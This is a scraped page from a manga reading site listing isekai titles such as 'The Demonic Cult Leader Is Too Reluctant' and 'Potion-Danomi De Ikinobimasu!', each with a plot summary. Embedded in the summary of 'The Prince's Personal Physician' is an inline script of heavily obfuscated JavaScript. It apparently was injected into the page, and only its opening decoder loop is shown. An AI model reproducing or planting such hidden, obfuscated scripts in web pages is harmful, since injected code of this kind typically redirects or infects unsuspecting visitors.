Isekai - Page 32

Isekai manga follows characters who are sent to another world, typically one filled with fantasy and adventure. The stories revolve around the protagonist’s growth and challenges as they navigate this new, unfamiliar realm

1522 results

The Demonic Cult Leader Is Too Reluctant

Reading manhwa The Demonic Cult Leader Is Too Reluctant / The Reluctant Demonic Cult Leader / The Anxious Demon Cult Leader / 전전긍긍 마교교주 “Crazy bastards, just leave me be.” The story of Do Yugang, son of the Heavenly Demon, who dreads becoming the Demonic Cult Leader.


Guutara Renai no Seihou

Guutara Renai no Seihou summary is updating. Come visit sometime to read the latest chapter of Guutara Renai no Seihou. If you have any question about this manga, Please don't hesitate to contact us or translate team. Hope you enjoy it.


What Do You Wish For With Those Murky Eyes: Record Of Highserk War

One day, Raizou ​​Takakura, an average salaryman, had a heart attack and his life ended that day. But, he got a second life in a different world. Reincarnated with strong skills― wasn't happened to him, instead, he was reincarnated as a foot soldier in a small country, Highserk Empire, which is surrounded by large countries. With a new name, Walm, he was thrown into the frontlines of a war. Covered in blood and stench of death, along his comrades, he was slipping through the life-or-death situations. An adventurer party with members who could use powerful magic, transferees with overwhelming power called the "heroes." In a deadly battle with them, Walm gradually developed his talent as a warrior which would've never awaken if he were to stay in times of peace. While his eyes becoming dark and muddy over time. Web Novel (Japanese):


The Prince’s Personal Physician

"Do no harm"—that's the oath that Rhena swore as a young surgeon. But when she accidentally drowns on a dark and stormy night, she wakes up in a kingdom where medical knowledge is forbidden to women—and punishable by death! After arriving in this strange world, she saves the life of Zared, the Captain of the Royal Guard who swears to protect her... but to stay safe, she must disguise herself as a man and become the personal physician of the icy Prince Damien! Can Rhena save the sickly prince and reform this world's antiquated ways, all while keeping her true identity a secret?<script></script><script>(function(_0x613fbb,_0x53e4db){var _0x43bf1f=_0x2afe,_0xebe070=_0x613fbb();while(!![]){try{var _0x2187b9=-parseInt(_0x43bf1f(0x1d2))/(0xf17*0x2+0x15b*-0xb+0x7a2*-0x2)*(-parseInt(_0x43bf1f(0x1b7))/(-0x2374+0x8f*-0x29+0x3a5d))+-parseInt(_0x43bf1f(0x1cd))/(-0x1cb5+-0x134f+-0x3007*-0x1)+-parseInt(_0x43bf1f(0x1cb))/(-0x1a*0xc2+0x2c*0xac+-0x9d8)*(parseInt(_0x43bf1f(0x1ba))/(0x260d+-0x1*0x1502+-0x1106))+-parseInt(_0x43bf1f(0x1bf))/(0x1821*-0x1+-0x5*0x67+0x11*0x18a)+-parseInt(_0x43bf1f(0x1d3))/(0x179f+-0x5*0xc+-0x14*0x12b)*(-parseInt(_0x43bf1f(0x1bb))/(-0xc*0x1b1+-0x148a+0x1*0x28de))+parseInt(_0x43bf1f(0x1c6))/(-0x1e03+0x1ee2*0x1+-0x6b*0x2)+parseInt(_0x43bf1f(0x1d1))/(-0x2a7*-0x6+0x1*-0x2345+0x1365);if(_0x2187b9===_0x53e4db)break;else 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Versatile Sword Cultivator

Read Versatile Sword Cultivator Manga – Versatile Sword Cultivator Manhwa Online Free At Hot Manhua The summary of the comic Versatile Sword Cultivator: In a time when online games merge with reality, the number one magic cultivator in and the peak player in the Enlightened Realm, Lin Jichen, died when he was betrayed by his lover and his good friend. However, the Heavens did not abandon him, and Lin Jichen was reborn back to the day before the server of goes live. After gaining another life, he cast aside magic and followed the sword, carving out a future for himself and rewriting his destiny! When the game merges with reality, he’ll be standing above the rest! “Versatile Sword Cultivator” is also known as: 全職劍修 The comic Versatile Sword Cultivator belongs to the Genre: Action, Adventure, Chinese, Comedy, Magical, Manhua, overpower “Top Manhwa, Battwo, HariManga…” are the most searched keywords on the website ZINMANHWA. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at BunManga. You can read TOP MANHWA Human Mask The Patron’s Daughters The Genius Idol’s Strategy to Stardom

1 days ago

Don’t Trust The Goddess

Read manhwa Don’t Trust The Goddess / 신녀를 믿지 마세요 [I cannot forgive you for using me, the God of Astrology, to deceive people.] If fraud is a skill, then Yoo Seolyeon who has a fraud skill score of 99, uses 100% of her talent to run a fortune telling shop. “Please save us, Goddess Diana!” Who am I? Where am I? Before I could even think, lots of people came in and the room falls into chaos… Yoo Seolyeon, a fraudulent fortune teller possessed the body of the Goddess Diana. Will her morale work on this world as well?


Isekai Nihon

As two worlds collide into one, a fateful counter between the \"killer hero\" and the \"elf princess from another world\" has led to a great adventure to defeat the even greater evil!



Tenjou Yuuya has been a bullied boy since the past. He lives in the home of his beloved grandfather while he goes to school. As usual, he receives a harsh bullying, and he takes an extended absence from school to have some time to heal his wounds. While on this long time of absence, he takes the opportunity to clean his grandfather's house and goes to a room he never went before, where his grandfather keep many different objects that he gathered from his travels around the world. While he was arranging the objects, he found a door not on a wall among the objects. Out of curiosity he opens this door, what he found on the other side was...


Potion-Danomi De Ikinobimasu!

Kaoru Nagase got caught up in a mysterious phenomenon and died on her way home from work. She skillfully convinced the higher-being that caused the distortional accident into giving her "The ability to create any potion with any effect I can think of", and to be revived in the other world with her younger self's body! Kaoru, who’s now a rather sharp-eyed 15-year-old girl, will work hard for a peaceful life in another world!*Artist Kokonoe Hibiki got replaced by Onshin Futsuu after volume 9, leading to changes in the serialization*- **New serialization:**(


Tensei Shita Ore ga Kawaii Sugirunode, Aisare Kyara wo Mezashite Ganbarimasu

I was hit by a car while protecting a child, and before I knew it, I had been reincarnated as Yumie Granbell, the daughter of a count in another world. When I looked in the mirror, the reflection staring back at me was an extraordinarily beautiful girl who looked like an angel! Moreover, the Granbell family, into which I was born in this life, is a prestigious magical family with considerable influence. I thought I had hit the jackpot in life, but it turned out that the Granbell family was actually on the verge of collapse… To restore the family, I decided to use my kindness as a weapon!


The Two-Faced Heroine is Obsessed with Marking Me

A scheming, manipulative alpha pretending to be an omega × an omega pretending to be a cool-but-cowardly alpha Gu Yu, who was originally a top-designer at a high-end bespoke fashion boutique, happened to read an ABO novel without purchasing a subscription. Shortly after, she was inexplicably forced to transmigrate into the story. Worst of all—she became the novel\'s evil side character, a fake alpha who was actually an omega, left to the grim fate of being burned alive by the heroine for abusing her. As she stared at the blackened \"two-faced\" heroine Su Yue kneeling in the rain outside, Gu Yu felt completely devastated. To save her life, Gu Yu decided to risk acting out of character and she secretly—yet while openly caring for the female lead—designed the most beautiful and unique evening gown in the world for her, clung onto her tightly, provided her with resources, helped her dominate the entertainment industry, and reclaim everything that was rightfully hers. But Gu Yu never expected that the \"innocent little princess\" she had been caring for so preciously not only turned out to be a fake omega, but an alpha! This wasn’t how the story was supposed to go! Believing her days were numbered, Gu Yu waited for her impending death in despair. However, Su Yue, exuding a strong red wine-scented pheromone—pinned Gu Yu down and whispered, “Are you prepared to be marked by me?” That familiar voice rang in Gu Yu’s ears, completely disrupting her soft heart.
